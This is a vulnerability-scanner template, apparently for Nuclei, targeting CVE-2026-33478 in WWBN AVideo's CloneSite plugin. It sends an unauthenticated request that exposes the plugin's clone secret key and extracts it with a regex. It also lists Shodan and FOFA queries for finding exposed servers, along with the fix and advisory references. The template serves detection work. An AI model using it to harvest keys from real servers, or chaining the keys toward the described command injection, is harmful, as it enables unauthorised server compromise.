AVideo <= 26.0 - WWBN AVideo - Remote Code Execution

id: CVE-2026-33478

info:
  name: AVideo <= 26.0 - WWBN AVideo - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    WWBN AVideo <= 26.0 contains multiple vulnerabilities in the CloneSite plugin including unauthenticated exposure of clone secret keys and OS command injection in rsync command construction, letting unauthenticated attackers achieve remote code execution.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands, leading to full server compromise.
  remediation: |
    Update to the version including commit c85d076375fab095a14170df7ddb27058134d38c or later.
  reference:
    - https://github.com/WWBN/AVideo/security/advisories/GHSA-687q-32c6-8x68
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.html:"AVideo"
    fofa-query: app="AVideo-YouPHPTube"
  tags: cve,cve2026,avideo,clonesite,unauth,oss,vkev

http:
  - raw:
      - |
        GET /plugin/CloneSite/clones.json.php HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"data": ['
          - '"key":"'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: word
        part: body
        words:
          - '"error"'
          - "Admin required"
        negative: true
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: key
        group: 1
        part: body
        regex:
          - '"key":"([0-9a-z]+)"'
# digest: 4a0a0047304502205a81085a2319ec651de3bebae07fc8ec5d0632d7d32ad22dad3ef064d0ae1b71022100e0e1bee92f2bfc805b4ba7a2df4907333b87d8a1b8e9ad5f0af093a511875455:922c64590222798bb761d5b6d8e72950